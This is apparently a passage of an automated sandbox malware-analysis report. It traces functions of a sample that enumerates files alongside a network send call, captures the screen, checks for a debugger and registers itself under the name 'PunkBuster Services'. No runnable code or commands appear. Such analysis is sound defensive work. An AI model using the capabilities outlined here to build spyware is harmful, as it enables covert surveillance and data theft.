                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                              • String ID:
                                              • API String ID: 4212172061-0
                                              • Opcode ID: ba0b78a7be99331f80499641488928d4615f50e416df077138342ec3cb34fd44
                                              • Instruction ID: aee84a0b32f61fa792fd0e0d93d9bb881e6d08991ed2584887c6e5f05d10a2f2
                                              • Opcode Fuzzy Hash: ba0b78a7be99331f80499641488928d4615f50e416df077138342ec3cb34fd44
                                              • Instruction Fuzzy Hash: 6361C675E04306AAD72EAB65DC42BEB73A8EF5C310F140579F905DB181EBB0A9C587A0
                                              Function 000C8DA7 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 000C8DAC
                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 000C8E24
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 000C8E4D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileFind$FirstH_prologNext
                                              • String ID:
                                              • API String ID: 301083792-0
                                              • Opcode ID: 13c22fc1d0ace76c8a51299cc0d0dbe8d19a7762fa29327fab1ecc867d74f326
                                              • Instruction ID: f2fe5d25104957b25bfbc08a0063c7a3140b487ae7aedc30a75ddabd34bd1763
                                              • Opcode Fuzzy Hash: 13c22fc1d0ace76c8a51299cc0d0dbe8d19a7762fa29327fab1ecc867d74f326
                                              • Instruction Fuzzy Hash: 477132329001199BCB15EBA0DC96EED7778AF15310F14826EF916A7193EF306F49CB94
                                              Function 00110E6A Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00106EBF: GetLastError.KERNEL32(?,000FE260,000F931C,000FE260,?,?,000FB955,FF8BC35D), ref: 00106EC3
                                                • Part of subcall function 00106EBF: _free.LIBCMT ref: 00106EF6
                                                • Part of subcall function 00106EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00106F37
                                                • Part of subcall function 00106EBF: _abort.LIBCMT ref: 00106F3D
                                                • Part of subcall function 00106EBF: _free.LIBCMT ref: 00106F1E
                                                • Part of subcall function 00106EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00106F2B
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00110EBE
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00110F0F
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00110FCF
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorInfoLastLocale$_free$_abort
                                              • String ID:
                                              • API String ID: 2829624132-0
                                              • Opcode ID: 671e414f0ad8ff4b697d6598ad70af4202d101fbf88e2dfa7babff60085c7a21
                                              • Instruction ID: dae6909e0feade99bf21c1618b571382145b6db1980a04a29474d880a67bb169
                                              • Opcode Fuzzy Hash: 671e414f0ad8ff4b697d6598ad70af4202d101fbf88e2dfa7babff60085c7a21
                                              • Instruction Fuzzy Hash: 2A619C71940217ABDB2D9F24CD82BFAB7A8EF18300F104179FA05C6585F77499D1DB50
                                              Function 000FA65D Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,000F4403), ref: 000FA755
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,000F4403), ref: 000FA75F
                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,000F4403), ref: 000FA76C
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                              • String ID:
                                              • API String ID: 3906539128-0
                                              • Opcode ID: 46ea00d07fed2b67c38d03779cf1e4bddbb71416ea6f157909e459960eb6449b
                                              • Instruction ID: f8e422e7775bd429ede1058c2cac564da0b43ee431189a788f0886223ab6c3d6
                                              • Opcode Fuzzy Hash: 46ea00d07fed2b67c38d03779cf1e4bddbb71416ea6f157909e459960eb6449b
                                              • Instruction Fuzzy Hash: 3A31C27490121C9BCB21DF64D988BDDBBB8BF08310F5042DAE91CA7291EB349F819F45
                                              Function 00102554 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcess.KERNEL32(001053F8,?,0010252A,001053F8,0012DAE0,0000000C,00102681,001053F8,00000002,00000000,?,001053F8), ref: 00102575
                                              • TerminateProcess.KERNEL32(00000000,?,0010252A,001053F8,0012DAE0,0000000C,00102681,001053F8,00000002,00000000,?,001053F8), ref: 0010257C
                                              • ExitProcess.KERNEL32 ref: 0010258E
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$CurrentExitTerminate
                                              • String ID:
                                              • API String ID: 1703294689-0
                                              • Opcode ID: 001148e16fc790fe7706febcf4cca8547556c30d03f7471c3c5269c08a392a31
                                              • Instruction ID: 04951ed884bd2014f7b69d2ec4148271dc3a88cdee79c7851596af0f987eddd3
                                              • Opcode Fuzzy Hash: 001148e16fc790fe7706febcf4cca8547556c30d03f7471c3c5269c08a392a31
                                              • Instruction Fuzzy Hash: 3DE09231004148AFCB156F54DE19AD93B69AB60355F008114F8869AAB1CBB5EE82DA94
                                              Function 0010D5E9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: .
                                              • API String ID: 0-248832578
                                              • Opcode ID: 980228290d21201ce0127c062c2106e9dc4f083a3648404de72205e1ce2db64d
                                              • Instruction ID: 0c0650649ef698c5454316cf9514202ab1731384c7620f02658c0fa67c28fe5b
                                              • Opcode Fuzzy Hash: 980228290d21201ce0127c062c2106e9dc4f083a3648404de72205e1ce2db64d
                                              • Instruction Fuzzy Hash: EE313A719002086FCB24DEB8DC84EFB7BBDDB86304F144198F999D7291E7B19D458B50
                                              Function 00107597 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0010374A,?,00000004), ref: 001075EA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InfoLocale
                                              • String ID: GetLocaleInfoEx
                                              • API String ID: 2299586839-2904428671
                                              • Opcode ID: 5352fc74b8fd83687bf65a95178347af60258ae33769874f04e47a2ef207d60b
                                              • Instruction ID: 4d40a4f12f4970e5d523c49b60ebcd3f5b7da3b7685a195dd31c48bd3b76f218
                                              • Opcode Fuzzy Hash: 5352fc74b8fd83687bf65a95178347af60258ae33769874f04e47a2ef207d60b
                                              • Instruction Fuzzy Hash: 57F0F071A44608BBCB09AF64EC06FEEBB64EB08710F014164BC05262E1CBB1AE60A695
                                              Function 000D8C69 Relevance: 3.2, APIs: 2, Instructions: 245fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 000D8EBF
                                              • FindNextFileW.KERNEL32(00000000,?,?), ref: 000D8F8B
                                                • Part of subcall function 000DB61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,000C9F65), ref: 000DB633
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$Find$CreateFirstNext
                                              • String ID:
                                              • API String ID: 341183262-0
                                              • Opcode ID: b4e769483ad15f90620a2859f5a4e7a1585b7783587950e5a81d4475bf1c2ca6
                                              • Instruction ID: f25d1dbe581fb346e2b68b334a610c0a2011047ba21214ba44882dadb3614acc
                                              • Opcode Fuzzy Hash: b4e769483ad15f90620a2859f5a4e7a1585b7783587950e5a81d4475bf1c2ca6
                                              • Instruction Fuzzy Hash: 228120315082409BD314FB60D8A2FEFB3A5AF92710F50492DF956972D3EF309A49C752
                                              Function 000C6AC2 Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 000C6ADD
                                              • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 000C6BA5
                                                • Part of subcall function 000C4468: send.WS2_32(?,00000000,00000000,00000000), ref: 000C44FD
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileFind$FirstNextsend
                                              • String ID:
                                              • API String ID: 4113138495-0
                                              • Opcode ID: beab55d701883397db26ffd70b578168bad83847b07ef45cbff51548dde5e603
                                              • Instruction ID: 00fe44ae20f23dd76224f95808df376192bc3ec7ca82a27b6f72b0c814306a5a
                                              • Opcode Fuzzy Hash: beab55d701883397db26ffd70b578168bad83847b07ef45cbff51548dde5e603
                                              • Instruction Fuzzy Hash: EF2161325083005BC714FB60DD95FEFB7A8AF96360F40092DF99693193EF31AA49CA52
                                              Function 001110BA Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00106EBF: GetLastError.KERNEL32(?,000FE260,000F931C,000FE260,?,?,000FB955,FF8BC35D), ref: 00106EC3
                                                • Part of subcall function 00106EBF: _free.LIBCMT ref: 00106EF6
                                                • Part of subcall function 00106EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00106F37
                                                • Part of subcall function 00106EBF: _abort.LIBCMT ref: 00106F3D
                                                • Part of subcall function 00106EBF: _free.LIBCMT ref: 00106F1E
                                                • Part of subcall function 00106EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00106F2B
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0011110E
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                              • String ID:
                                              • API String ID: 1663032902-0
                                              • Opcode ID: 9a2f9edeb6fe5ccd4b5a13e398697ef14c7346c8f49d6938ab01e3ef8c5e3189
                                              • Instruction ID: 39135fc54a4b0dd1427d1363a15158535317a15237f40e6196ddb003cc121186
                                              • Opcode Fuzzy Hash: 9a2f9edeb6fe5ccd4b5a13e398697ef14c7346c8f49d6938ab01e3ef8c5e3189
                                              • Instruction Fuzzy Hash: F1216D3291020ABBDB2CAA24DC46AFAF3A8EB15310F10417AEF01C6281EB759D94CA50
                                              Function 00110D42 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00106EBF: GetLastError.KERNEL32(?,000FE260,000F931C,000FE260,?,?,000FB955,FF8BC35D), ref: 00106EC3
                                                • Part of subcall function 00106EBF: _free.LIBCMT ref: 00106EF6
                                                • Part of subcall function 00106EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00106F37
                                                • Part of subcall function 00106EBF: _abort.LIBCMT ref: 00106F3D
                                              • EnumSystemLocalesW.KERNEL32(00110E6A,00000001,00000000,?,00103CEC,?,00111497,00000000,?,?,?), ref: 00110DB4
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                              • String ID:
                                              • API String ID: 1084509184-0
                                              • Opcode ID: 6054488d857aa9dbf50391f3dc6cc6794ce6b7e9a1d040daccab8e6ae0805d5e
                                              • Instruction ID: 9b979bac908085a014aa3b98a749c29a62b889acd4ac30b9cd3a991030704f5f
                                              • Opcode Fuzzy Hash: 6054488d857aa9dbf50391f3dc6cc6794ce6b7e9a1d040daccab8e6ae0805d5e
                                              • Instruction Fuzzy Hash: 661106366047059FDB1D9F79D8915BAB7A2FF84318B14443CE98647B40D3B178C2C740
                                              Function 001112EA Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00106EBF: GetLastError.KERNEL32(?,000FE260,000F931C,000FE260,?,?,000FB955,FF8BC35D), ref: 00106EC3
                                                • Part of subcall function 00106EBF: _free.LIBCMT ref: 00106EF6
                                                • Part of subcall function 00106EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00106F37
                                                • Part of subcall function 00106EBF: _abort.LIBCMT ref: 00106F3D
                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00111088,00000000,00000000,?), ref: 00111316
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$InfoLocale_abort_free
                                              • String ID:
                                              • API String ID: 2692324296-0
                                              • Opcode ID: 7d0f0c34ca825961e8760d8628f88129dae4b90fdecc4d9dd599331c4e2d8939
                                              • Instruction ID: 5c73ecb49441db6f6a173d95809437e10f16c64dfe58d040c77706cc256bc60b
                                              • Opcode Fuzzy Hash: 7d0f0c34ca825961e8760d8628f88129dae4b90fdecc4d9dd599331c4e2d8939
                                              • Instruction Fuzzy Hash: 0BF0F932A20115BBDB2C6A25CC05AFAB768FB40764F050439ED15A3684EB70FDC1C6D0
                                              Function 00110DDD Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00106EBF: GetLastError.KERNEL32(?,000FE260,000F931C,000FE260,?,?,000FB955,FF8BC35D), ref: 00106EC3
                                                • Part of subcall function 00106EBF: _free.LIBCMT ref: 00106EF6
                                                • Part of subcall function 00106EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00106F37
                                                • Part of subcall function 00106EBF: _abort.LIBCMT ref: 00106F3D
                                              • EnumSystemLocalesW.KERNEL32(001110BA,00000001,?,?,00103CEC,?,0011145B,00103CEC,?,?,?,?,?,00103CEC,?,?), ref: 00110E29
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                              • String ID:
                                              • API String ID: 1084509184-0
                                              • Opcode ID: 094ad126bb36dd16fb227b004750e3144d780b2647249fcfee7fc643f9f1df0b
                                              • Instruction ID: 3cff079c78db5692ae750d19ebfbef9de75b9dfcc2d5a2907283e2a273d7b153
                                              • Opcode Fuzzy Hash: 094ad126bb36dd16fb227b004750e3144d780b2647249fcfee7fc643f9f1df0b
                                              • Instruction Fuzzy Hash: 05F022366003045FDB1A5F7ADC81AAA7B91EF84328B05843CFA418B680D3B1ACC2C650
                                              Function 001070AE Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00104ACC: EnterCriticalSection.KERNEL32(-0003D155,?,0010225B,00000000,0012DAC0,0000000C,00102216,?,?,?,00108739,?,?,00106F74,00000001,00000364), ref: 00104ADB
                                              • EnumSystemLocalesW.KERNEL32(00107068,00000001,0012DC48,0000000C), ref: 001070E6
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                              • String ID:
                                              • API String ID: 1272433827-0
                                              • Opcode ID: 69203375e2be55c29dca55b7fbc333518e0a78027ef946f7934092123617d1f8
                                              • Instruction ID: 544671ac8221c3708f7d80184223e7edf72c779b1538cf6dd6b965abab19e1d7
                                              • Opcode Fuzzy Hash: 69203375e2be55c29dca55b7fbc333518e0a78027ef946f7934092123617d1f8
                                              • Instruction Fuzzy Hash: 70F06D72A10204EFDB05EF78E846B9D77F0EB09720F108219F510DB6E2CBB49985DB41
                                              Function 00110CF7 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00106EBF: GetLastError.KERNEL32(?,000FE260,000F931C,000FE260,?,?,000FB955,FF8BC35D), ref: 00106EC3
                                                • Part of subcall function 00106EBF: _free.LIBCMT ref: 00106EF6
                                                • Part of subcall function 00106EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00106F37
                                                • Part of subcall function 00106EBF: _abort.LIBCMT ref: 00106F3D
                                              • EnumSystemLocalesW.KERNEL32(00110C4E,00000001,?,?,?,001114B9,00103CEC,?,?,?,?,?,00103CEC,?,?,?), ref: 00110D2E
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                              • String ID:
                                              • API String ID: 1084509184-0
                                              • Opcode ID: ac5909e0ee12e7517ac11b5ecbf0748e59c8644b2240c0e203d6ea200cb91409
                                              • Instruction ID: 911b74ec1920a81aee54396468e0ecda0bbf81715a805835c5270b93e493d1da
                                              • Opcode Fuzzy Hash: ac5909e0ee12e7517ac11b5ecbf0748e59c8644b2240c0e203d6ea200cb91409
                                              • Instruction Fuzzy Hash: 4EF0E53A70020557CB1AAF75EC557AA7F95EFC5750B0740A9EA098B790C7B1A8C3CBA0
                                              Function 000F3CD7 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,000F39B1), ref: 000F3CDC
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: bc6e26fc5698c13ef6de70dd63ab622d4a06cf204ce3de8bb92095cdc028a0a1
                                              • Instruction ID: ee8600c23808b2f69a73c07016f8567af36f7491015584c7c93db7f445a19e21
                                              • Opcode Fuzzy Hash: bc6e26fc5698c13ef6de70dd63ab622d4a06cf204ce3de8bb92095cdc028a0a1
                                              • Instruction Fuzzy Hash:
                                              Function 0010E92E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: HeapProcess
                                              • String ID:
                                              • API String ID: 54951025-0
                                              • Opcode ID: 3f6e3fda3b5aad93b6d827c5f833fbbd3672801bafcb673eebefa34d3da0169b
                                              • Instruction ID: 19261bbff854fd5fdfcb543270669b7d10bd812551fd546c859259a3edc6afa6
                                              • Opcode Fuzzy Hash: 3f6e3fda3b5aad93b6d827c5f833fbbd3672801bafcb673eebefa34d3da0169b
                                              • Instruction Fuzzy Hash: 1AA01230102201CB93004F315F0524936A96705181300C014A005C1A60DA2040C04600
                                              Function 000D7F9F Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 324windowmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 000D7FB9
                                              • CreateCompatibleDC.GDI32(00000000), ref: 000D7FC4
                                                • Part of subcall function 000D8452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 000D8482
                                              • CreateCompatibleBitmap.GDI32(?,00000000), ref: 000D8045
                                              • DeleteDC.GDI32(?), ref: 000D805D
                                              • DeleteDC.GDI32(00000000), ref: 000D8060
                                              • SelectObject.GDI32(00000000,00000000), ref: 000D806B
                                              • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 000D8093
                                              • GetIconInfo.USER32(?,?), ref: 000D80CB
                                              • DeleteObject.GDI32(?), ref: 000D80FA
                                              • DeleteObject.GDI32(?), ref: 000D8107
                                              • DrawIcon.USER32(00000000,?,?,?), ref: 000D8114
                                              • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 000D8144
                                              • GetObjectA.GDI32(?,00000018,?), ref: 000D8173
                                              • LocalAlloc.KERNEL32(00000040,00000028), ref: 000D81BC
                                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 000D81DF
                                              • GlobalAlloc.KERNEL32(00000000,?), ref: 000D8248
                                              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 000D826B
                                              • DeleteDC.GDI32(?), ref: 000D827F
                                              • DeleteDC.GDI32(00000000), ref: 000D8282
                                              • DeleteObject.GDI32(00000000), ref: 000D8285
                                              • GlobalFree.KERNEL32(00CC0020), ref: 000D8290
                                              • DeleteObject.GDI32(00000000), ref: 000D8344
                                              • GlobalFree.KERNEL32(?), ref: 000D834B
                                              • DeleteDC.GDI32(?), ref: 000D835B
                                              • DeleteDC.GDI32(00000000), ref: 000D8366
                                              • DeleteDC.GDI32(?), ref: 000D8398
                                              • DeleteDC.GDI32(00000000), ref: 000D839B
                                              • DeleteObject.GDI32(?), ref: 000D83A1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                              • String ID: DISPLAY
                                              • API String ID: 1765752176-865373369
                                              • Opcode ID: 4db0d775fed252b876c7cffa8fcb056294ce311c28e6bec0e592b099bcfbfffa
                                              • Instruction ID: c36b3caf3f3399118b5f0f1f010a917749b42fb1f6c846ecb6b822544c709916
                                              • Opcode Fuzzy Hash: 4db0d775fed252b876c7cffa8fcb056294ce311c28e6bec0e592b099bcfbfffa
                                              • Instruction Fuzzy Hash: 8FC16D71508344AFD764DB24DC44BABBBF9FF89700F04891EF589936A1EB30A945CB61
                                              Function 004073EA Relevance: 51.0, APIs: 17, Strings: 12, Instructions: 222registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 004073EF
                                              • GetSystemDirectoryA.KERNEL32(?,00000400), ref: 00407463
                                                • Part of subcall function 004BC79F: __lock.LIBCMT ref: 004BC7BD
                                                • Part of subcall function 004BC79F: HeapFree.KERNEL32(00000000,?,0050EE00,0000000C,004C280D,00000000,0050F518,00000008,004C2842,?,?,?,004BD45A,00000004,0050EE80,0000000C), ref: 004BC804
                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall\PunkBusterSvc\,00000000,000F003F,?), ref: 00407555
                                              • RegCreateKeyA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall\PunkBusterSvc\,?), ref: 00407568
                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall\PunkBusterSvc\,00000000,000F003F,?), ref: 0040757D
                                              • _strlen.LIBCMT ref: 004075A3
                                              • RegSetValueExA.ADVAPI32(?,UninstallString,00000000,00000002,?,00000001), ref: 004075C8
                                              • _strlen.LIBCMT ref: 004075D0
                                              • RegSetValueExA.ADVAPI32(?,DisplayName,00000000,00000002,PunkBuster Services,00000001), ref: 004075E7
                                              • _strlen.LIBCMT ref: 0040760D
                                              • RegSetValueExA.ADVAPI32(?,DisplayVersion,00000000,00000002,?,00000001), ref: 0040762C
                                              • _strlen.LIBCMT ref: 00407634
                                              • RegSetValueExA.ADVAPI32(?,HelpLink,00000000,00000002,http://www.evenbalance.com/index.php?page=pbsvcfaq.php,00000001), ref: 0040764B
                                              • _strlen.LIBCMT ref: 0040764E
                                              • RegSetValueExA.ADVAPI32(?,URLInfoAbout,00000000,00000002,http://www.evenbalance.com/index.php?page=pbsvcfaq.php,00000001), ref: 00407665
                                              • _strlen.LIBCMT ref: 0040766D
                                              • RegSetValueExA.ADVAPI32(?,Publisher,00000000,00000002,Even Balance, Inc.,00000001), ref: 00407684
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Value_strlen$Open$CreateDirectoryFreeH_prologHeapSystem__lock
                                              • String ID: -u$%d.%d$DisplayName$DisplayVersion$Even Balance, Inc.$HelpLink$Publisher$PunkBuster Services$Software\Microsoft\Windows\CurrentVersion\Uninstall\PunkBusterSvc\$URLInfoAbout$UninstallString$http://www.evenbalance.com/index.php?page=pbsvcfaq.php
                                              • API String ID: 1366487629-2471671963
                                              • Opcode ID: 3f66010ca4bbd8cec7424b12d3089067c989c62d95de6c32389d2ecf475b48bc
                                              • Instruction ID: 3b5f2e55fd99b0cb6fb53e510ead61fc6bd0a11c4e949306d876edae8efe3064
